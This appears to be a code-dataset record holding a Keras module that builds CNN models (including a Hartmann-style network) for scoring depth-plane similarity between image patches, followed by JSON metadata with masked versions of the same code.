model = Model(inputs=x_in, outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss='categorical_crossentropy',
metrics=['accuracy'])
cnn.compile('sgd', 'mse')
sim.compile('sgd', 'mse')
model.cnn = cnn
model.sim = sim
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
def get_nn(name):
models = {'simple_cnn': build_simple_cnn, 'simple_nn_for_training':
build_simple_nn_for_training, 'hartmann': build_hartmann_network}
return models[name]
<|reserved_special_token_1|>
import os
import h5py
import numpy as np
from keras import backend as K
from keras.layers import Activation, BatchNormalization, Conv2D, Dense, Dot, \
Dropout, Flatten, Input, MaxPooling2D, GlobalAveragePooling2D
from keras import regularizers
from keras.layers import Average as KerasAverage
from keras.models import Sequential, Model
from keras.optimizers import Adam, SGD
from keras.engine.topology import Layer
from .layers import LayerNormalization, CustomSoftmax
from .tf_implementations.loss_functions import loss_factory
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(
x if x != -1 else None
for x in self.target_shape
)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == "tensorflow":
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError("TopKAverage is not implemented for "
" %s backend" % (K.backend(),))
def reducer_factory(reducer, k=3):
# Set the type of the reducer to be used
if reducer == "max":
return Max()
elif reducer == "average":
return Average()
elif reducer == "topK":
return TopKAverage(k)
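# Illustrative note (added, not in the original source): the reducers above
# collapse the per-patch similarity axis into one score per depth plane.
# For per-patch scores [0.9, 0.1, 0.8, 0.7] on a single depth plane:
#     Average()      -> 0.625
#     Max()          -> 0.9
#     TopKAverage(3) -> mean of {0.9, 0.8, 0.7} = 0.8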
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
def mde(y_true, y_pred):
return K.mean(K.cast(
K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred, axis=1)),
K.floatx()
))
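# Worked example (added for clarity; values are illustrative, not from the
# source): with one-hot depth targets, `mde` measures how many depth planes the
# prediction is off by, while `mae` is the plain mean absolute error.
#     y_true = [[0, 0, 1, 0], [1, 0, 0, 0]]   # true planes 2 and 0
#     y_pred = [[0, 1, 0, 0], [1, 0, 0, 0]]   # predicted planes 1 and 0
#     mae -> mean(|y_true - y_pred|)                 = 0.25
#     mde -> mean(|argmax(y_true) - argmax(y_pred)|) = 0.5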
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
)
return Sequential([
Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization()
])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
)
return Sequential([
Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization()
])
def create_dilated_cnn_receptive_field_25(
input_shape,
kernel_regularizer=None
):
return Sequential([
Conv2D(
filters=32,
kernel_size=5,
input_shape=input_shape,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer,
dilation_rate=2
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer,
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization()
])
def create_dilated_cnn_receptive_field_25_with_tanh(
input_shape,
kernel_regularizer=None
):
return Sequential([
Conv2D(
filters=32,
kernel_size=5,
input_shape=input_shape,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer,
dilation_rate=2
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer,
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization()
])
def create_hartmann_cnn(input_shape, kernel_regularizer=None):
return Sequential([
Conv2D(filters=32, kernel_size=5, input_shape=input_shape),
Activation("tanh"),
MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=5),
Activation("tanh"),
MaxPooling2D(pool_size=(2, 2))
])
def cnn_factory(name):
cnn_factories = {
"simple_cnn": create_simple_cnn,
"simple_cnn_ln": create_simple_cnn_ln,
"dilated_cnn_receptive_field_25":
create_dilated_cnn_receptive_field_25,
"dilated_cnn_receptive_field_25_with_tanh":
create_dilated_cnn_receptive_field_25_with_tanh,
"hartmann_cnn": create_hartmann_cnn
}
return cnn_factories[name]
def optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):
# Set the type of optimizer to be used
if optimizer == "Adam":
return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)
elif optimizer == "SGD":
return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm,
clipvalue=clipvalue)
def kernel_regularizer_factory(regularizer_factor):
if regularizer_factor == 0.0:
return None
else:
return regularizers.l2(regularizer_factor)
def build_simple_cnn(
input_shape,
create_cnn,
optimizer="Adam",
lr=1e-3,
momentum=None,
clipnorm=0.0,
loss="mse",
reducer="average",
merge_layer="dot-product",
weight_decay=None,
weight_file=None
):
# Make sure that we have a proper input shape
# TODO: Maybe change this to 3, because we finally need only the
# patch_shape?
assert len(input_shape) == 5
# Unpack the input shape to make the code more readable
D, N, W, H, C = input_shape
model = create_cnn(
input_shape=(None, None, C),
kernel_regularizer=weight_decay
)
model.compile(
optimizer=optimizer_factory(
optimizer,
lr=lr,
momentum=momentum,
clipnorm=clipnorm
),
loss=loss_factory(loss)
)
# If there is a weight file specified load the weights
if weight_file:
try:
f = h5py.File(weight_file, "r")
keys = [os.path.join(model.name, w.name)
for l in model.layers for w in l.weights]
weights = [f[os.path.join("model_weights", k)][:] for k in keys]
model.set_weights(weights)
        except Exception:
model.load_weights(weight_file, by_name=True)
return model
def build_simple_nn_for_training(
input_shape,
create_cnn,
optimizer="Adam",
lr=1e-3,
momentum=None,
clipnorm=0.0,
loss="emd",
reducer="average",
merge_layer="dot-product",
weight_decay=None,
weight_file=None
):
# Make sure that we have a proper input shape
assert len(input_shape) == 5
# Unpack the input shape to make the code more readable
    input_shape = list(input_shape)
    for i in range(len(input_shape)):
        if input_shape[i] is not None:
            input_shape[i] = int(input_shape[i])
    input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
# Create the two stream inputs
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
# Reshape them for input in the CNN
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
# Create the CNN and extract features from both streams
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
# Compute a kind of similarity between the features of the two streams
x = Dot(axes=-1, normalize=(merge_layer == "cosine-similarity"))([x1, x2])
# Reshape them back into their semantic shape (depth planes, patches, etc)
x = TotalReshape((-1, D, N))(x)
# Compute the final similarity scores for each depth plane
x = reducer_factory(reducer)(x)
# Compute the final output
y = Activation("softmax")(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(
optimizer=optimizer_factory(
optimizer,
lr=lr,
momentum=momentum,
clipnorm=clipnorm
),
loss=loss_factory(loss),
metrics=["accuracy", mae, mde]
)
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
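# Hedged usage sketch (added for illustration; the shapes, array names and
# hyper-parameters below are assumptions, not from the original source).
# input_shape is (D, N, W, H, C): D candidate depth planes, N patches per
# plane, and W x H x C patch crops; the model takes two such streams and
# outputs a softmax over the D depth planes.
#
#     net = build_simple_nn_for_training(
#         input_shape=(32, 4, 11, 11, 3),
#         create_cnn=cnn_factory("simple_cnn"),
#         optimizer="Adam", lr=1e-3, loss="emd", reducer="average",
#     )
#     # x_ref, x_neighbours: arrays of shape (batch, 32, 4, 11, 11, 3)
#     # y: one-hot labels of shape (batch, 32)
#     net.fit([x_ref, x_neighbours], y, batch_size=8)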
def build_hartmann_network(
input_shape,
create_cnn=create_hartmann_cnn,
optimizer="SGD",
lr=1e-3,
momentum=None,
clipnorm=0.0,
loss=None,
reducer=None,
merge_layer=None,
weight_decay=None,
weight_file=None
):
# Make sure that we have a proper input shape
assert len(input_shape) == 3
# Unpack the input shape to make the code more readable
H, W, C = input_shape
# Create the feature extracting CNN
cnn = create_hartmann_cnn(input_shape=(None, None, C))
# Create the similarity CNN
sim = Sequential([
Conv2D(
filters=2048,
kernel_size=5,
input_shape=K.int_shape(cnn.output)[1:]
),
Activation("relu"),
Conv2D(filters=2048, kernel_size=1),
Activation("relu"),
Conv2D(filters=2, kernel_size=1),
Activation("softmax")
])
# Create the joint model for training
x_in = [Input(shape=input_shape) for i in range(5)]
x = [cnn(xi) for xi in x_in]
x = KerasAverage()(x)
y = sim(x)
model = Model(inputs=x_in, outputs=y)
# Compile all the models
model.compile(
optimizer=optimizer_factory(
optimizer,
lr=lr,
momentum=momentum,
clipnorm=clipnorm
),
loss="categorical_crossentropy",
metrics=["accuracy"]
)
cnn.compile("sgd", "mse") # Just so that we can run predict()
sim.compile("sgd", "mse")
# Attach the cnn and sim to the model in case someone wants to use them
model.cnn = cnn
model.sim = sim
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
def get_nn(name):
models = {
"simple_cnn": build_simple_cnn,
"simple_nn_for_training": build_simple_nn_for_training,
"hartmann": build_hartmann_network
}
return models[name]
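# Hedged example of composing the factories above (added for illustration; the
# configuration strings and values are assumptions, not from the source):
#
#     build = get_nn("simple_cnn")
#     model = build(
#         input_shape=(32, 4, 11, 11, 3),
#         create_cnn=cnn_factory("dilated_cnn_receptive_field_25"),
#         optimizer="SGD", lr=1e-2, momentum=0.9,
#         weight_decay=kernel_regularizer_factory(1e-5),
#     )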
|
flexible
|
{
"blob_id": "0eefae7e0d341d74154bbe480f5ed766829e3ce3",
"index": 3734,
"step-1": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\n<mask token>\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\n<mask token>\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\n<mask token>\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\n<mask token>\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\n<mask token>\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization()])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None\n ):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\n<mask token>\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 
'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\n<mask token>\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\n<mask token>\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\ndef mde(y_true, y_pred):\n return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,\n axis=1)), K.floatx()))\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization()])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None\n ):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25_with_tanh(input_shape,\n kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, 
kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\ndef create_hartmann_cnn(input_shape, kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),\n Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D\n (pool_size=(2, 2))])\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\n<mask token>\n\n\ndef build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,\n momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer\n ='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n D, N, W, H, C = input_shape\n model = create_cnn(input_shape=(None, None, C), kernel_regularizer=\n weight_decay)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss))\n if weight_file:\n try:\n f = h5py.File(weight_file, 'r')\n keys = [os.path.join(model.name, w.name) for l in model.layers for\n w in l.weights]\n weights = [f[os.path.join('model_weights', k)][:] for k in keys]\n model.set_weights(weights)\n except:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\ndef reducer_factory(reducer, k=3):\n if reducer == 'max':\n return Max()\n elif reducer == 'average':\n return Average()\n elif reducer == 'topK':\n return TopKAverage(k)\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\ndef mde(y_true, y_pred):\n return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,\n axis=1)), K.floatx()))\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization(), Activation('relu'), Conv2D(**common_params),\n BatchNormalization()])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None\n ):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, 